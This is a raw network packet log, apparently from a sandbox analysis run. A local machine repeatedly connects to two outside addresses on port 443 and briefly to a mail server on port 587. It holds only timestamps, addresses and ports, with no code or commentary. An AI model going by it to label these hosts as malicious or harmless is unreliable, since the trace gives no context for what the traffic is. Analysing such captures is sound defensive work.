                                                                                                Jan 6, 2025 07:56:58.518392086 CET443610925.253.86.15192.168.2.6
                                                                                                Jan 6, 2025 07:56:58.518431902 CET443610925.253.86.15192.168.2.6
                                                                                                Jan 6, 2025 07:56:58.518457890 CET61092443192.168.2.65.253.86.15
                                                                                                Jan 6, 2025 07:56:58.518470049 CET443610925.253.86.15192.168.2.6
                                                                                                Jan 6, 2025 07:56:58.518484116 CET61092443192.168.2.65.253.86.15
                                                                                                Jan 6, 2025 07:56:58.518491983 CET443610925.253.86.15192.168.2.6
                                                                                                Jan 6, 2025 07:56:58.518515110 CET61092443192.168.2.65.253.86.15
                                                                                                Jan 6, 2025 07:56:58.518522024 CET443610925.253.86.15192.168.2.6
                                                                                                Jan 6, 2025 07:56:58.518538952 CET443610925.253.86.15192.168.2.6
                                                                                                Jan 6, 2025 07:56:58.518556118 CET61092443192.168.2.65.253.86.15
                                                                                                Jan 6, 2025 07:56:58.518570900 CET61092443192.168.2.65.253.86.15
                                                                                                Jan 6, 2025 07:56:58.518575907 CET443610925.253.86.15192.168.2.6
                                                                                                Jan 6, 2025 07:56:58.518615961 CET61092443192.168.2.65.253.86.15
                                                                                                Jan 6, 2025 07:56:58.518680096 CET443610925.253.86.15192.168.2.6
                                                                                                Jan 6, 2025 07:56:58.518734932 CET61092443192.168.2.65.253.86.15
                                                                                                Jan 6, 2025 07:56:58.518940926 CET443610925.253.86.15192.168.2.6
                                                                                                Jan 6, 2025 07:56:58.518990040 CET443610925.253.86.15192.168.2.6
                                                                                                Jan 6, 2025 07:56:58.518997908 CET61092443192.168.2.65.253.86.15
                                                                                                Jan 6, 2025 07:56:58.519001961 CET443610925.253.86.15192.168.2.6
                                                                                                Jan 6, 2025 07:56:58.519035101 CET61092443192.168.2.65.253.86.15
                                                                                                Jan 6, 2025 07:56:58.519042969 CET443610925.253.86.15192.168.2.6
                                                                                                Jan 6, 2025 07:56:58.519090891 CET61092443192.168.2.65.253.86.15
                                                                                                Jan 6, 2025 07:56:58.519228935 CET443610925.253.86.15192.168.2.6
                                                                                                Jan 6, 2025 07:56:58.519279957 CET61092443192.168.2.65.253.86.15
                                                                                                Jan 6, 2025 07:56:58.519388914 CET443610925.253.86.15192.168.2.6
                                                                                                Jan 6, 2025 07:56:58.519437075 CET61092443192.168.2.65.253.86.15
                                                                                                Jan 6, 2025 07:56:58.519452095 CET443610925.253.86.15192.168.2.6
                                                                                                Jan 6, 2025 07:56:58.519500971 CET61092443192.168.2.65.253.86.15
                                                                                                Jan 6, 2025 07:56:58.519534111 CET443610925.253.86.15192.168.2.6
                                                                                                Jan 6, 2025 07:56:58.519582033 CET61092443192.168.2.65.253.86.15
                                                                                                Jan 6, 2025 07:56:58.596056938 CET443610925.253.86.15192.168.2.6
                                                                                                Jan 6, 2025 07:56:58.596128941 CET61092443192.168.2.65.253.86.15
                                                                                                Jan 6, 2025 07:56:58.596360922 CET443610925.253.86.15192.168.2.6
                                                                                                Jan 6, 2025 07:56:58.596405983 CET443610925.253.86.15192.168.2.6
                                                                                                Jan 6, 2025 07:56:58.596426964 CET61092443192.168.2.65.253.86.15
                                                                                                Jan 6, 2025 07:56:58.596427917 CET443610925.253.86.15192.168.2.6
                                                                                                Jan 6, 2025 07:56:58.596443892 CET443610925.253.86.15192.168.2.6
                                                                                                Jan 6, 2025 07:56:58.596482992 CET61092443192.168.2.65.253.86.15
                                                                                                Jan 6, 2025 07:56:58.596503973 CET443610925.253.86.15192.168.2.6
                                                                                                Jan 6, 2025 07:56:58.596506119 CET61092443192.168.2.65.253.86.15
                                                                                                Jan 6, 2025 07:56:58.596515894 CET443610925.253.86.15192.168.2.6
                                                                                                Jan 6, 2025 07:56:58.596550941 CET61092443192.168.2.65.253.86.15
                                                                                                Jan 6, 2025 07:56:58.596677065 CET443610925.253.86.15192.168.2.6
                                                                                                Jan 6, 2025 07:56:58.596724033 CET61092443192.168.2.65.253.86.15
                                                                                                Jan 6, 2025 07:56:58.596735954 CET443610925.253.86.15192.168.2.6
                                                                                                Jan 6, 2025 07:56:58.596780062 CET61092443192.168.2.65.253.86.15
                                                                                                Jan 6, 2025 07:56:58.596927881 CET443610925.253.86.15192.168.2.6
                                                                                                Jan 6, 2025 07:56:58.596968889 CET61092443192.168.2.65.253.86.15
                                                                                                Jan 6, 2025 07:56:58.596992970 CET443610925.253.86.15192.168.2.6
                                                                                                Jan 6, 2025 07:56:58.597050905 CET61092443192.168.2.65.253.86.15
                                                                                                Jan 6, 2025 07:56:58.597088099 CET443610925.253.86.15192.168.2.6
                                                                                                Jan 6, 2025 07:56:58.597136021 CET61092443192.168.2.65.253.86.15
                                                                                                Jan 6, 2025 07:56:58.597162962 CET443610925.253.86.15192.168.2.6
                                                                                                Jan 6, 2025 07:56:58.597203016 CET443610925.253.86.15192.168.2.6
                                                                                                Jan 6, 2025 07:56:58.597206116 CET61092443192.168.2.65.253.86.15
                                                                                                Jan 6, 2025 07:56:58.597213030 CET443610925.253.86.15192.168.2.6
                                                                                                Jan 6, 2025 07:56:58.597248077 CET61092443192.168.2.65.253.86.15
                                                                                                Jan 6, 2025 07:56:58.597395897 CET443610925.253.86.15192.168.2.6
                                                                                                Jan 6, 2025 07:56:58.597436905 CET61092443192.168.2.65.253.86.15
                                                                                                Jan 6, 2025 07:56:58.673887014 CET443610925.253.86.15192.168.2.6
                                                                                                Jan 6, 2025 07:56:58.673957109 CET61092443192.168.2.65.253.86.15
                                                                                                Jan 6, 2025 07:56:58.674073935 CET443610925.253.86.15192.168.2.6
                                                                                                Jan 6, 2025 07:56:58.674118042 CET443610925.253.86.15192.168.2.6
                                                                                                Jan 6, 2025 07:56:58.674129009 CET61092443192.168.2.65.253.86.15
                                                                                                Jan 6, 2025 07:56:58.674154997 CET443610925.253.86.15192.168.2.6
                                                                                                Jan 6, 2025 07:56:58.674170017 CET61092443192.168.2.65.253.86.15
                                                                                                Jan 6, 2025 07:56:58.674202919 CET61092443192.168.2.65.253.86.15
                                                                                                Jan 6, 2025 07:56:58.674241066 CET443610925.253.86.15192.168.2.6
                                                                                                Jan 6, 2025 07:56:58.674284935 CET443610925.253.86.15192.168.2.6
                                                                                                Jan 6, 2025 07:56:58.674288034 CET61092443192.168.2.65.253.86.15
                                                                                                Jan 6, 2025 07:56:58.674298048 CET443610925.253.86.15192.168.2.6
                                                                                                Jan 6, 2025 07:56:58.674340010 CET61092443192.168.2.65.253.86.15
                                                                                                Jan 6, 2025 07:56:58.674349070 CET61092443192.168.2.65.253.86.15
                                                                                                Jan 6, 2025 07:56:58.674417973 CET443610925.253.86.15192.168.2.6
                                                                                                Jan 6, 2025 07:56:58.674474001 CET61092443192.168.2.65.253.86.15
                                                                                                Jan 6, 2025 07:56:58.674647093 CET443610925.253.86.15192.168.2.6
                                                                                                Jan 6, 2025 07:56:58.674690962 CET61092443192.168.2.65.253.86.15
                                                                                                Jan 6, 2025 07:56:58.674701929 CET443610925.253.86.15192.168.2.6
                                                                                                Jan 6, 2025 07:56:58.674746990 CET61092443192.168.2.65.253.86.15
                                                                                                Jan 6, 2025 07:56:58.674761057 CET443610925.253.86.15192.168.2.6
                                                                                                Jan 6, 2025 07:56:58.674802065 CET61092443192.168.2.65.253.86.15
                                                                                                Jan 6, 2025 07:56:58.674911976 CET443610925.253.86.15192.168.2.6
                                                                                                Jan 6, 2025 07:56:58.674953938 CET61092443192.168.2.65.253.86.15
                                                                                                Jan 6, 2025 07:56:58.675055027 CET443610925.253.86.15192.168.2.6
                                                                                                Jan 6, 2025 07:56:58.675097942 CET61092443192.168.2.65.253.86.15
                                                                                                Jan 6, 2025 07:56:58.675105095 CET443610925.253.86.15192.168.2.6
                                                                                                Jan 6, 2025 07:56:58.675121069 CET443610925.253.86.15192.168.2.6
                                                                                                Jan 6, 2025 07:56:58.675139904 CET61092443192.168.2.65.253.86.15
                                                                                                Jan 6, 2025 07:56:58.675147057 CET443610925.253.86.15192.168.2.6
                                                                                                Jan 6, 2025 07:56:58.675162077 CET443610925.253.86.15192.168.2.6
                                                                                                Jan 6, 2025 07:56:58.675164938 CET61092443192.168.2.65.253.86.15
                                                                                                Jan 6, 2025 07:56:58.675199986 CET61092443192.168.2.65.253.86.15
                                                                                                Jan 6, 2025 07:56:58.675204992 CET443610925.253.86.15192.168.2.6
                                                                                                Jan 6, 2025 07:56:58.675240993 CET61092443192.168.2.65.253.86.15
                                                                                                Jan 6, 2025 07:56:58.751682043 CET443610925.253.86.15192.168.2.6
                                                                                                Jan 6, 2025 07:56:58.751749039 CET61092443192.168.2.65.253.86.15
                                                                                                Jan 6, 2025 07:56:58.751946926 CET443610925.253.86.15192.168.2.6
                                                                                                Jan 6, 2025 07:56:58.751991987 CET443610925.253.86.15192.168.2.6
                                                                                                Jan 6, 2025 07:56:58.752001047 CET61092443192.168.2.65.253.86.15
                                                                                                Jan 6, 2025 07:56:58.752007961 CET443610925.253.86.15192.168.2.6
                                                                                                Jan 6, 2025 07:56:58.752054930 CET61092443192.168.2.65.253.86.15
                                                                                                Jan 6, 2025 07:56:58.752230883 CET443610925.253.86.15192.168.2.6
                                                                                                Jan 6, 2025 07:56:58.752276897 CET61092443192.168.2.65.253.86.15
                                                                                                Jan 6, 2025 07:56:58.752295017 CET443610925.253.86.15192.168.2.6
                                                                                                Jan 6, 2025 07:56:58.752338886 CET61092443192.168.2.65.253.86.15
                                                                                                Jan 6, 2025 07:56:58.752434015 CET443610925.253.86.15192.168.2.6
                                                                                                Jan 6, 2025 07:56:58.752475023 CET61092443192.168.2.65.253.86.15
                                                                                                Jan 6, 2025 07:56:58.752485991 CET443610925.253.86.15192.168.2.6
                                                                                                Jan 6, 2025 07:56:58.752541065 CET61092443192.168.2.65.253.86.15
                                                                                                Jan 6, 2025 07:56:58.752657890 CET443610925.253.86.15192.168.2.6
                                                                                                Jan 6, 2025 07:56:58.752703905 CET61092443192.168.2.65.253.86.15
                                                                                                Jan 6, 2025 07:56:58.752710104 CET443610925.253.86.15192.168.2.6
                                                                                                Jan 6, 2025 07:56:58.752737045 CET443610925.253.86.15192.168.2.6
                                                                                                Jan 6, 2025 07:56:58.752815962 CET61092443192.168.2.65.253.86.15
                                                                                                Jan 6, 2025 07:56:58.752821922 CET443610925.253.86.15192.168.2.6
                                                                                                Jan 6, 2025 07:56:58.752892017 CET61092443192.168.2.65.253.86.15
                                                                                                Jan 6, 2025 07:56:58.830250978 CET443610925.253.86.15192.168.2.6
                                                                                                Jan 6, 2025 07:56:58.830312967 CET61092443192.168.2.65.253.86.15
                                                                                                Jan 6, 2025 07:56:58.830429077 CET443610925.253.86.15192.168.2.6
                                                                                                Jan 6, 2025 07:56:58.830465078 CET443610925.253.86.15192.168.2.6
                                                                                                Jan 6, 2025 07:56:58.830487013 CET61092443192.168.2.65.253.86.15
                                                                                                Jan 6, 2025 07:56:58.830497980 CET443610925.253.86.15192.168.2.6
                                                                                                Jan 6, 2025 07:56:58.830511093 CET61092443192.168.2.65.253.86.15
                                                                                                Jan 6, 2025 07:56:58.830534935 CET61092443192.168.2.65.253.86.15
                                                                                                Jan 6, 2025 07:56:58.830560923 CET443610925.253.86.15192.168.2.6
                                                                                                Jan 6, 2025 07:56:58.830602884 CET61092443192.168.2.65.253.86.15
                                                                                                Jan 6, 2025 07:56:58.830624104 CET443610925.253.86.15192.168.2.6
                                                                                                Jan 6, 2025 07:56:58.830662966 CET61092443192.168.2.65.253.86.15
                                                                                                Jan 6, 2025 07:56:58.830777884 CET443610925.253.86.15192.168.2.6
                                                                                                Jan 6, 2025 07:56:58.830826044 CET443610925.253.86.15192.168.2.6
                                                                                                Jan 6, 2025 07:56:58.830828905 CET61092443192.168.2.65.253.86.15
                                                                                                Jan 6, 2025 07:56:58.830838919 CET443610925.253.86.15192.168.2.6
                                                                                                Jan 6, 2025 07:56:58.830888987 CET61092443192.168.2.65.253.86.15
                                                                                                Jan 6, 2025 07:56:58.831007957 CET443610925.253.86.15192.168.2.6
                                                                                                Jan 6, 2025 07:56:58.831046104 CET61092443192.168.2.65.253.86.15
                                                                                                Jan 6, 2025 07:56:58.831053019 CET443610925.253.86.15192.168.2.6
                                                                                                Jan 6, 2025 07:56:58.831089020 CET61092443192.168.2.65.253.86.15
                                                                                                Jan 6, 2025 07:56:58.831108093 CET61092443192.168.2.65.253.86.15
                                                                                                Jan 6, 2025 07:56:58.831127882 CET443610925.253.86.15192.168.2.6
                                                                                                Jan 6, 2025 07:56:58.831175089 CET61092443192.168.2.65.253.86.15
                                                                                                Jan 6, 2025 07:56:58.831185102 CET443610925.253.86.15192.168.2.6
                                                                                                Jan 6, 2025 07:56:58.831239939 CET61092443192.168.2.65.253.86.15
                                                                                                Jan 6, 2025 07:56:58.831469059 CET443610925.253.86.15192.168.2.6
                                                                                                Jan 6, 2025 07:56:58.831511021 CET443610925.253.86.15192.168.2.6
                                                                                                Jan 6, 2025 07:56:58.831518888 CET61092443192.168.2.65.253.86.15
                                                                                                Jan 6, 2025 07:56:58.831531048 CET443610925.253.86.15192.168.2.6
                                                                                                Jan 6, 2025 07:56:58.831551075 CET61092443192.168.2.65.253.86.15
                                                                                                Jan 6, 2025 07:56:58.831566095 CET61092443192.168.2.65.253.86.15
                                                                                                Jan 6, 2025 07:56:58.908114910 CET443610925.253.86.15192.168.2.6
                                                                                                Jan 6, 2025 07:56:58.908190012 CET61092443192.168.2.65.253.86.15
                                                                                                Jan 6, 2025 07:56:58.908199072 CET443610925.253.86.15192.168.2.6
                                                                                                Jan 6, 2025 07:56:58.908214092 CET443610925.253.86.15192.168.2.6
                                                                                                Jan 6, 2025 07:56:58.908242941 CET443610925.253.86.15192.168.2.6
                                                                                                Jan 6, 2025 07:56:58.908262014 CET61092443192.168.2.65.253.86.15
                                                                                                Jan 6, 2025 07:56:58.908273935 CET443610925.253.86.15192.168.2.6
                                                                                                Jan 6, 2025 07:56:58.908287048 CET61092443192.168.2.65.253.86.15
                                                                                                Jan 6, 2025 07:56:58.908308983 CET61092443192.168.2.65.253.86.15
                                                                                                Jan 6, 2025 07:56:58.908309937 CET443610925.253.86.15192.168.2.6
                                                                                                Jan 6, 2025 07:56:58.908320904 CET443610925.253.86.15192.168.2.6
                                                                                                Jan 6, 2025 07:56:58.908349991 CET61092443192.168.2.65.253.86.15
                                                                                                Jan 6, 2025 07:56:58.908375025 CET443610925.253.86.15192.168.2.6
                                                                                                Jan 6, 2025 07:56:58.908421040 CET61092443192.168.2.65.253.86.15
                                                                                                Jan 6, 2025 07:56:58.908427000 CET443610925.253.86.15192.168.2.6
                                                                                                Jan 6, 2025 07:56:58.908471107 CET61092443192.168.2.65.253.86.15
                                                                                                Jan 6, 2025 07:56:58.908545971 CET443610925.253.86.15192.168.2.6
                                                                                                Jan 6, 2025 07:56:58.908595085 CET61092443192.168.2.65.253.86.15
                                                                                                Jan 6, 2025 07:56:58.908603907 CET443610925.253.86.15192.168.2.6
                                                                                                Jan 6, 2025 07:56:58.908646107 CET61092443192.168.2.65.253.86.15
                                                                                                Jan 6, 2025 07:56:58.908812046 CET443610925.253.86.15192.168.2.6
                                                                                                Jan 6, 2025 07:56:58.908854961 CET61092443192.168.2.65.253.86.15
                                                                                                Jan 6, 2025 07:56:58.908858061 CET443610925.253.86.15192.168.2.6
                                                                                                Jan 6, 2025 07:56:58.908879042 CET443610925.253.86.15192.168.2.6
                                                                                                Jan 6, 2025 07:56:58.908905029 CET61092443192.168.2.65.253.86.15
                                                                                                Jan 6, 2025 07:56:58.908929110 CET61092443192.168.2.65.253.86.15
                                                                                                Jan 6, 2025 07:56:58.908931017 CET443610925.253.86.15192.168.2.6
                                                                                                Jan 6, 2025 07:56:58.908941031 CET443610925.253.86.15192.168.2.6
                                                                                                Jan 6, 2025 07:56:58.908991098 CET61092443192.168.2.65.253.86.15
                                                                                                Jan 6, 2025 07:56:58.909002066 CET443610925.253.86.15192.168.2.6
                                                                                                Jan 6, 2025 07:56:58.909041882 CET61092443192.168.2.65.253.86.15
                                                                                                Jan 6, 2025 07:56:58.909061909 CET443610925.253.86.15192.168.2.6
                                                                                                Jan 6, 2025 07:56:58.909142017 CET443610925.253.86.15192.168.2.6
                                                                                                Jan 6, 2025 07:56:58.909183979 CET61092443192.168.2.65.253.86.15
                                                                                                Jan 6, 2025 07:56:58.910810947 CET61092443192.168.2.65.253.86.15
                                                                                                Jan 6, 2025 07:57:12.815231085 CET61094443192.168.2.6104.26.12.205
                                                                                                Jan 6, 2025 07:57:12.815277100 CET44361094104.26.12.205192.168.2.6
                                                                                                Jan 6, 2025 07:57:12.815359116 CET61094443192.168.2.6104.26.12.205
                                                                                                Jan 6, 2025 07:57:12.819468975 CET61094443192.168.2.6104.26.12.205
                                                                                                Jan 6, 2025 07:57:12.819484949 CET44361094104.26.12.205192.168.2.6
                                                                                                Jan 6, 2025 07:57:13.308655024 CET44361094104.26.12.205192.168.2.6
                                                                                                Jan 6, 2025 07:57:13.308742046 CET61094443192.168.2.6104.26.12.205
                                                                                                Jan 6, 2025 07:57:13.311017990 CET61094443192.168.2.6104.26.12.205
                                                                                                Jan 6, 2025 07:57:13.311028957 CET44361094104.26.12.205192.168.2.6
                                                                                                Jan 6, 2025 07:57:13.311271906 CET44361094104.26.12.205192.168.2.6
                                                                                                Jan 6, 2025 07:57:13.384807110 CET61094443192.168.2.6104.26.12.205
                                                                                                Jan 6, 2025 07:57:13.431324959 CET44361094104.26.12.205192.168.2.6
                                                                                                Jan 6, 2025 07:57:13.497386932 CET44361094104.26.12.205192.168.2.6
                                                                                                Jan 6, 2025 07:57:13.497450113 CET44361094104.26.12.205192.168.2.6
                                                                                                Jan 6, 2025 07:57:13.497816086 CET61094443192.168.2.6104.26.12.205
                                                                                                Jan 6, 2025 07:57:13.500461102 CET61094443192.168.2.6104.26.12.205
                                                                                                Jan 6, 2025 07:57:14.293373108 CET61095587192.168.2.6162.254.34.31
                                                                                                Jan 6, 2025 07:57:14.298276901 CET58761095162.254.34.31192.168.2.6
                                                                                                Jan 6, 2025 07:57:14.298428059 CET61095587192.168.2.6162.254.34.31
                                                                                                Jan 6, 2025 07:57:14.933096886 CET58761095162.254.34.31192.168.2.6
                                                                                                Jan 6, 2025 07:57:14.969300032 CET61095587192.168.2.6162.254.34.31
                                                                                                Jan 6, 2025 07:57:14.974237919 CET58761095162.254.34.31192.168.2.6
                                                                                                Jan 6, 2025 07:57:15.142016888 CET58761095162.254.34.31192.168.2.6
                                                                                                Jan 6, 2025 07:57:15.146552086 CET61095587192.168.2.6162.254.34.31
                                                                                                Jan 6, 2025 07:57:15.151365042 CET58761095162.254.34.31192.168.2.6
                                                                                                Jan 6, 2025 07:57:15.318233013 CET58761095162.254.34.31192.168.2.6
                                                                                                Jan 6, 2025 07:57:15.319101095 CET61095587192.168.2.6162.254.34.31
                                                                                                Jan 6, 2025 07:57:15.323936939 CET58761095162.254.34.31192.168.2.6
                                                                                                Jan 6, 2025 07:57:15.503103018 CET58761095162.254.34.31192.168.2.6
                                                                                                Jan 6, 2025 07:57:15.507781982 CET61095587192.168.2.6162.254.34.31
                                                                                                Jan 6, 2025 07:57:15.512933016 CET58761095162.254.34.31192.168.2.6
                                                                                                Jan 6, 2025 07:57:15.679544926 CET58761095162.254.34.31192.168.2.6
                                                                                                Jan 6, 2025 07:57:15.681883097 CET61095587192.168.2.6162.254.34.31
                                                                                                Jan 6, 2025 07:57:15.686742067 CET58761095162.254.34.31192.168.2.6
                                                                                                Jan 6, 2025 07:57:15.855175018 CET58761095162.254.34.31192.168.2.6
                                                                                                Jan 6, 2025 07:57:15.855375051 CET61095587192.168.2.6162.254.34.31
                                                                                                Jan 6, 2025 07:57:15.860219002 CET58761095162.254.34.31192.168.2.6
                                                                                                Jan 6, 2025 07:57:16.026880026 CET58761095162.254.34.31192.168.2.6
                                                                                                Jan 6, 2025 07:57:16.027561903 CET61095587192.168.2.6162.254.34.31
                                                                                                Jan 6, 2025 07:57:16.027637959 CET61095587192.168.2.6162.254.34.31
                                                                                                Jan 6, 2025 07:57:16.027671099 CET61095587192.168.2.6162.254.34.31
                                                                                                Jan 6, 2025 07:57:16.027684927 CET61095587192.168.2.6162.254.34.31
                                                                                                Jan 6, 2025 07:57:16.032468081 CET58761095162.254.34.31192.168.2.6
                                                                                                Jan 6, 2025 07:57:16.032478094 CET58761095162.254.34.31192.168.2.6
                                                                                                Jan 6, 2025 07:57:16.032597065 CET58761095162.254.34.31192.168.2.6
                                                                                                Jan 6, 2025 07:57:16.032607079 CET58761095162.254.34.31192.168.2.6
                                                                                                Jan 6, 2025 07:57:16.320450068 CET58761095162.254.34.31192.168.2.6
                                                                                                Jan 6, 2025 07:57:16.487296104 CET61095587192.168.2.6162.254.34.31
                                                                                                Jan 6, 2025 07:57:23.482470036 CET61106443192.168.2.65.253.86.15
                                                                                                Jan 6, 2025 07:57:23.482516050 CET443611065.253.86.15192.168.2.6
                                                                                                Jan 6, 2025 07:57:23.483053923 CET61106443192.168.2.65.253.86.15
                                                                                                Jan 6, 2025 07:57:23.487740040 CET61106443192.168.2.65.253.86.15
                                                                                                Jan 6, 2025 07:57:23.487759113 CET443611065.253.86.15192.168.2.6
                                                                                                Jan 6, 2025 07:57:24.274157047 CET443611065.253.86.15192.168.2.6
                                                                                                Jan 6, 2025 07:57:24.274344921 CET61106443192.168.2.65.253.86.15
                                                                                                Jan 6, 2025 07:57:24.281001091 CET61106443192.168.2.65.253.86.15
                                                                                                Jan 6, 2025 07:57:24.281014919 CET443611065.253.86.15192.168.2.6
                                                                                                Jan 6, 2025 07:57:24.281233072 CET443611065.253.86.15192.168.2.6
                                                                                                Jan 6, 2025 07:57:24.338929892 CET61106443192.168.2.65.253.86.15
                                                                                                Jan 6, 2025 07:57:24.383336067 CET443611065.253.86.15192.168.2.6
                                                                                                Jan 6, 2025 07:57:25.049509048 CET443611065.253.86.15192.168.2.6
                                                                                                Jan 6, 2025 07:57:25.049537897 CET443611065.253.86.15192.168.2.6
                                                                                                Jan 6, 2025 07:57:25.049597979 CET61106443192.168.2.65.253.86.15
                                                                                                Jan 6, 2025 07:57:25.049624920 CET443611065.253.86.15192.168.2.6
                                                                                                Jan 6, 2025 07:57:25.049719095 CET61106443192.168.2.65.253.86.15
                                                                                                Jan 6, 2025 07:57:25.050245047 CET443611065.253.86.15192.168.2.6
                                                                                                Jan 6, 2025 07:57:25.050287008 CET443611065.253.86.15192.168.2.6
                                                                                                Jan 6, 2025 07:57:25.050295115 CET61106443192.168.2.65.253.86.15
                                                                                                Jan 6, 2025 07:57:25.050299883 CET443611065.253.86.15192.168.2.6
                                                                                                Jan 6, 2025 07:57:25.050348997 CET61106443192.168.2.65.253.86.15
                                                                                                Jan 6, 2025 07:57:25.130618095 CET443611065.253.86.15192.168.2.6
                                                                                                Jan 6, 2025 07:57:25.130686998 CET61106443192.168.2.65.253.86.15
                                                                                                Jan 6, 2025 07:57:25.136051893 CET443611065.253.86.15192.168.2.6
                                                                                                Jan 6, 2025 07:57:25.136132002 CET61106443192.168.2.65.253.86.15
                                                                                                Jan 6, 2025 07:57:25.136137009 CET443611065.253.86.15192.168.2.6
                                                                                                Jan 6, 2025 07:57:25.136147022 CET443611065.253.86.15192.168.2.6
                                                                                                Jan 6, 2025 07:57:25.136192083 CET61106443192.168.2.65.253.86.15
                                                                                                Jan 6, 2025 07:57:25.259572029 CET443611065.253.86.15192.168.2.6
                                                                                                Jan 6, 2025 07:57:25.467338085 CET443611065.253.86.15192.168.2.6
                                                                                                Jan 6, 2025 07:57:25.467413902 CET61106443192.168.2.65.253.86.15
                                                                                                Jan 6, 2025 07:57:25.489171982 CET443611065.253.86.15192.168.2.6
                                                                                                Jan 6, 2025 07:57:25.489212036 CET443611065.253.86.15192.168.2.6
                                                                                                Jan 6, 2025 07:57:25.489279032 CET61106443192.168.2.65.253.86.15
                                                                                                Jan 6, 2025 07:57:25.489362001 CET61106443192.168.2.65.253.86.15
                                                                                                Jan 6, 2025 07:57:25.489377022 CET443611065.253.86.15192.168.2.6
                                                                                                Jan 6, 2025 07:57:25.489419937 CET61106443192.168.2.65.253.86.15
                                                                                                Jan 6, 2025 07:57:25.489976883 CET443611065.253.86.15192.168.2.6
                                                                                                Jan 6, 2025 07:57:25.490031004 CET61106443192.168.2.65.253.86.15
                                                                                                Jan 6, 2025 07:57:25.490839958 CET443611065.253.86.15192.168.2.6
                                                                                                Jan 6, 2025 07:57:25.490864992 CET443611065.253.86.15192.168.2.6
                                                                                                Jan 6, 2025 07:57:25.490895987 CET61106443192.168.2.65.253.86.15
                                                                                                Jan 6, 2025 07:57:25.490900993 CET443611065.253.86.15192.168.2.6
                                                                                                Jan 6, 2025 07:57:25.490923882 CET61106443192.168.2.65.253.86.15
                                                                                                Jan 6, 2025 07:57:25.491667032 CET443611065.253.86.15192.168.2.6
                                                                                                Jan 6, 2025 07:57:25.491688967 CET443611065.253.86.15192.168.2.6
                                                                                                Jan 6, 2025 07:57:25.491724968 CET61106443192.168.2.65.253.86.15
                                                                                                Jan 6, 2025 07:57:25.491729975 CET443611065.253.86.15192.168.2.6
                                                                                                Jan 6, 2025 07:57:25.491755962 CET61106443192.168.2.65.253.86.15
                                                                                                Jan 6, 2025 07:57:25.491780996 CET61106443192.168.2.65.253.86.15
                                                                                                Jan 6, 2025 07:57:25.629504919 CET443611065.253.86.15192.168.2.6
                                                                                                Jan 6, 2025 07:57:25.629591942 CET61106443192.168.2.65.253.86.15
                                                                                                Jan 6, 2025 07:57:25.629720926 CET443611065.253.86.15192.168.2.6
                                                                                                Jan 6, 2025 07:57:25.629761934 CET443611065.253.86.15192.168.2.6
                                                                                                Jan 6, 2025 07:57:25.629865885 CET61106443192.168.2.65.253.86.15
                                                                                                Jan 6, 2025 07:57:25.629873037 CET443611065.253.86.15192.168.2.6
                                                                                                Jan 6, 2025 07:57:25.629901886 CET61106443192.168.2.65.253.86.15
                                                                                                Jan 6, 2025 07:57:25.630414963 CET443611065.253.86.15192.168.2.6
                                                                                                Jan 6, 2025 07:57:25.630455971 CET61106443192.168.2.65.253.86.15
                                                                                                Jan 6, 2025 07:57:25.630460978 CET443611065.253.86.15192.168.2.6
                                                                                                Jan 6, 2025 07:57:25.631252050 CET443611065.253.86.15192.168.2.6
                                                                                                Jan 6, 2025 07:57:25.631284952 CET443611065.253.86.15192.168.2.6
                                                                                                Jan 6, 2025 07:57:25.631304026 CET61106443192.168.2.65.253.86.15
                                                                                                Jan 6, 2025 07:57:25.631308079 CET443611065.253.86.15192.168.2.6
                                                                                                Jan 6, 2025 07:57:25.631326914 CET61106443192.168.2.65.253.86.15
                                                                                                Jan 6, 2025 07:57:25.690483093 CET61106443192.168.2.65.253.86.15
                                                                                                Jan 6, 2025 07:57:25.762830973 CET443611065.253.86.15192.168.2.6
                                                                                                Jan 6, 2025 07:57:25.762844086 CET443611065.253.86.15192.168.2.6
                                                                                                Jan 6, 2025 07:57:25.762923956 CET61106443192.168.2.65.253.86.15
                                                                                                Jan 6, 2025 07:57:25.763403893 CET443611065.253.86.15192.168.2.6
                                                                                                Jan 6, 2025 07:57:25.763411045 CET443611065.253.86.15192.168.2.6
                                                                                                Jan 6, 2025 07:57:25.763458967 CET443611065.253.86.15192.168.2.6
                                                                                                Jan 6, 2025 07:57:25.763475895 CET61106443192.168.2.65.253.86.15
                                                                                                Jan 6, 2025 07:57:25.763483047 CET443611065.253.86.15192.168.2.6
                                                                                                Jan 6, 2025 07:57:25.763499975 CET61106443192.168.2.65.253.86.15
                                                                                                Jan 6, 2025 07:57:25.763865948 CET443611065.253.86.15192.168.2.6
                                                                                                Jan 6, 2025 07:57:25.763927937 CET443611065.253.86.15192.168.2.6
                                                                                                Jan 6, 2025 07:57:25.763955116 CET443611065.253.86.15192.168.2.6
                                                                                                Jan 6, 2025 07:57:25.763978958 CET61106443192.168.2.65.253.86.15
                                                                                                Jan 6, 2025 07:57:25.763983011 CET443611065.253.86.15192.168.2.6
                                                                                                Jan 6, 2025 07:57:25.763999939 CET61106443192.168.2.65.253.86.15
                                                                                                Jan 6, 2025 07:57:25.876998901 CET443611065.253.86.15192.168.2.6
                                                                                                Jan 6, 2025 07:57:25.877058029 CET61106443192.168.2.65.253.86.15
                                                                                                Jan 6, 2025 07:57:25.877074957 CET443611065.253.86.15192.168.2.6
                                                                                                Jan 6, 2025 07:57:25.877409935 CET443611065.253.86.15192.168.2.6
                                                                                                Jan 6, 2025 07:57:25.877456903 CET61106443192.168.2.65.253.86.15
                                                                                                Jan 6, 2025 07:57:25.877464056 CET443611065.253.86.15192.168.2.6
                                                                                                Jan 6, 2025 07:57:25.877680063 CET443611065.253.86.15192.168.2.6
                                                                                                Jan 6, 2025 07:57:25.877717018 CET443611065.253.86.15192.168.2.6
                                                                                                Jan 6, 2025 07:57:25.877722025 CET61106443192.168.2.65.253.86.15
                                                                                                Jan 6, 2025 07:57:25.877724886 CET443611065.253.86.15192.168.2.6
                                                                                                Jan 6, 2025 07:57:25.877753019 CET443611065.253.86.15192.168.2.6
                                                                                                Jan 6, 2025 07:57:25.877762079 CET61106443192.168.2.65.253.86.15
                                                                                                Jan 6, 2025 07:57:25.878321886 CET443611065.253.86.15192.168.2.6
                                                                                                Jan 6, 2025 07:57:25.878350019 CET443611065.253.86.15192.168.2.6
                                                                                                Jan 6, 2025 07:57:25.878366947 CET61106443192.168.2.65.253.86.15
                                                                                                Jan 6, 2025 07:57:25.878371954 CET443611065.253.86.15192.168.2.6
                                                                                                Jan 6, 2025 07:57:25.878392935 CET61106443192.168.2.65.253.86.15
                                                                                                Jan 6, 2025 07:57:25.878417015 CET61106443192.168.2.65.253.86.15
                                                                                                Jan 6, 2025 07:57:25.880326033 CET443611065.253.86.15192.168.2.6
